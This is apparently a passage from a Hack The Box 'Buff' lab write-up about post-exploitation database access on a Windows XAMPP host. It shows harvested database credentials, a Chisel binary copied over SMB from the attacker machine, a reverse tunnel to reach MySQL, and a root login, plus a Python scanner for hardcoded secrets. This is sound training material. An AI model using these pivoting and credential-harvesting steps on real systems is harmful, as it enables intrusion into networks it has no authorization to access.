DB


I saw earlier that the target port 3306 is up and listening on the loopback address

c:\xampp\htdocs\gym>dir
 Volume in drive C has no label.
 Volume Serial Number is A22D-49F7
 
 directory of c:\xampp\htdocs\gym
 
27/01/2023  11:31    <DIR>          .
27/01/2023  11:31    <DIR>          ..
16/06/2020  15:31                66 .gitattributes
16/06/2020  15:31           246,305 4.jpg
17/06/2020  13:44             6,277 about.php
16/06/2020  15:31    <DIR>          att
16/06/2020  15:31             3,541 att.php
16/06/2020  15:31    <DIR>          boot
17/06/2020  13:45             5,109 contact.php
16/06/2020  15:31             5,187 edit.php
16/06/2020  15:31               479 editp.php
16/06/2020  15:31    <DIR>          ex
17/06/2020  13:34             6,980 facilities.php
16/06/2020  15:31             5,598 Feedback.php
16/06/2020  15:31             3,579 home.php
16/06/2020  15:31    <DIR>          img
16/06/2020  17:50    <DIR>          include
17/06/2020  13:13             6,237 index.php
16/06/2020  15:31            18,025 LICENSE
16/06/2020  15:31             1,525 Navjeet.jpg
16/06/2020  15:31               140 New Text Document.txt
17/06/2020  13:33             8,731 packages.php
16/06/2020  15:31    <DIR>          profile
16/06/2020  15:31               309 README.md
16/06/2020  15:31             4,104 register.php
16/06/2020  15:31                44 register_success.php
02/11/2022  22:02             9,290 shell.php
16/06/2020  15:31               570 subfeed.php
16/06/2020  15:31             1,903 table.sql
16/06/2020  15:31             1,395 up.php
27/01/2023  10:58    <DIR>          upload
16/06/2020  15:31             1,308 upload.php
16/06/2020  15:31    <DIR>          workouts
              23 File(s)        339,704 bytes
              10 Dir(s)   8,284,041,216 bytes free
 
c:\xampp\htdocs\gym>type "New Text Document.txt"
$mysql_host = "mysql16.000webhost.com";
$mysql_database = "a8743500_secure";
$mysql_user = "a8743500_secure";
$mysql_password = "ipad12345";

I found the DB credential.

c:\xampp\htdocs\gym>where /R \ mysql.exe
c:\xampp\mysql\bin\mysql.exe

I initially thought that I would need to tunnel the port in order to access the backend DB on the loopback address. However, the MySQL CLI tool appears to be installed on the target system.

c:\xampp\htdocs\gym> C:\xampp\mysql\bin\mysql.exe -u "a8743500_secure" -p "ipad12345"

Attempting to sign in to the backend DB fails as the process just hangs. I guess that I would need to tunnel it after all.

Tunneling with Chisel


C:\tmp> copy \\10.10.14.11\smb\chiselx64.exe .
        1 file(s) copied.

I transferred Chisel to the target system over SMB

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ chisel server -p 55555 --reverse
2023/01/27 12:55:13 server: Reverse tunnelling enabled
2023/01/27 12:55:13 server: Fingerprint 941xbNdaSdfnTHmKf4xF8dknUO/M8/eKThQ0cdyl1X8=
2023/01/27 12:55:13 server: Listening on http://0.0.0.0:55555

Starting a Chisel server on Kali over port 55555

C:\tmp> chiselx64.exe client 10.10.14.11:55555 R:33060:127.0.0.1:3306
2023/01/27 11:56:03 client: Connecting to ws://10.10.14.11:55555
2023/01/27 11:56:03 client: Connected (Latency 32.6495ms)

From the target system, tunneling 127.0.0.1:3306 to Kali’s 33060

Connection received. Now I should be able to interact with the backend DB on Kali over port 33060

MySQL


┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ mysql -h 127.0.0.1 -P 33060 -ua8743500_secure -pipad12345
error 1045 (28000): Access denied for user 'a8743500_secure'@'localhost' (using password: YES)

I got access denied. Wrong credential?

c:\xampp\htdocs\gym\include>type psl-config.php
<?php
/**
 * These are the database login details
 */  
define("HOST", "localhost");     // The host you want to connect to.
define("USER", "root");    // The database username. 
define("PASSWORD", "");    // The database password. 
define("DATABASE", "gym");    // The database name.
 
define("CAN_REGISTER", "any");
define("DEFAULT_ROLE", "member");
 
define("SECURE", FALSE);    // FOR DEVELOPMENT ONLY!!!!
?>

I found another DB credential at c:\xampp\htdocs\gym\include\psl-config.php. The username is root and there is no password.
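Both credential leaks above follow the same two shapes: a PHP variable assignment such as `$mysql_password = "..."` dropped in a stray text file, and `define()` constants in `psl-config.php` with a root account, an empty password and `SECURE` set to `FALSE`. The scanner below is an added example, not code from the write-up; it walks file contents line by line and flags exactly those patterns, and the sample contents are constructed to mirror the two files above rather than being copies of them.

```python
import re
from collections import namedtuple

Finding = namedtuple("Finding", "path line issue detail")

# PHP "$mysql_password = '...';" assignments and define("KEY", "value") / define("KEY", FALSE)
ASSIGN_RE = re.compile(r'\$(\w+)\s*=\s*["\']([^"\']*)["\']')
DEFINE_RE = re.compile(
    r'define\(\s*["\'](\w+)["\']\s*,\s*(?:["\']([^"\']*)["\']|(TRUE|FALSE))\s*\)', re.I)
SECRET_KEYS = ("pass", "pwd", "secret")
USER_KEYS = ("user", "uid")

def classify(key, value, flag):
    """Map one config key/value pair to zero or more (issue, detail) tuples."""
    k, issues = key.lower(), []
    if any(s in k for s in SECRET_KEYS):
        if value == "":
            issues.append(("empty_password", f"{key} is empty"))
        elif value:
            issues.append(("hardcoded_secret", f"{key} holds a plaintext value"))
    if any(u in k for u in USER_KEYS) and value and value.lower() == "root":
        issues.append(("root_db_account", f"{key} = root"))
    if k == "secure" and flag and flag.upper() == "FALSE":
        issues.append(("secure_disabled", "SECURE is FALSE (development-only setting)"))
    return issues

def scan_text(path, text):
    """Scan one file's contents line by line; line numbers make findings easy to triage."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        pairs = [(m.group(1), m.group(2), None) for m in ASSIGN_RE.finditer(line)]
        pairs += [(m.group(1), m.group(2), m.group(3)) for m in DEFINE_RE.finditer(line)]
        for key, value, flag in pairs:
            for issue, detail in classify(key, value, flag):
                findings.append(Finding(path, lineno, issue, detail))
    return findings

# Constructed samples mirroring the two credential files from the write-up (not copies of them)
SAMPLES = {
    "New Text Document.txt": '$mysql_host = "mysql16.000webhost.com";\n'
                             '$mysql_user = "a8743500_secure";\n$mysql_password = "ipad12345";\n',
    "include/psl-config.php": '<?php\ndefine("HOST", "localhost");\ndefine("USER", "root");\n'
                              'define("PASSWORD", "");\ndefine("SECURE", FALSE);  // FOR DEVELOPMENT ONLY\n?>',
}

def scan_samples():
    """Run the scanner over the constructed samples; returns {path: [issue, ...]}."""
    return {name: [f.issue for f in scan_text(name, text)] for name, text in SAMPLES.items()}
```

Pointing `scan_text` at every `.php`, `.txt` and `.ini` file under a web root such as `c:\xampp\htdocs` turns this into a quick pre-deployment check for the leftovers that gave away DB access here.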

┌──(kali㉿kali)-[~/archive/htb/labs/buff]
└─$ mysql -h 127.0.0.1 -P 33060 -u root    
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 63
server version: 10.4.11-MariaDB mariadb.org binary distribution
 
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
MariaDB [(none)]> 

Yeap, that was the one.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| phpmyadmin         |
| table              |
| test               |
+--------------------+
6 rows in set (0.466 sec)

Where is gym? I see table and test

MariaDB [(none)]> use table;
Database changed
MariaDB [table]> show tables;
Empty set (0.032 sec)
MariaDB [table]> use test;
Database changed
MariaDB [test]> show tables;
Empty set (0.030 sec)
 

They are both empty.

I guess it’s a dead end.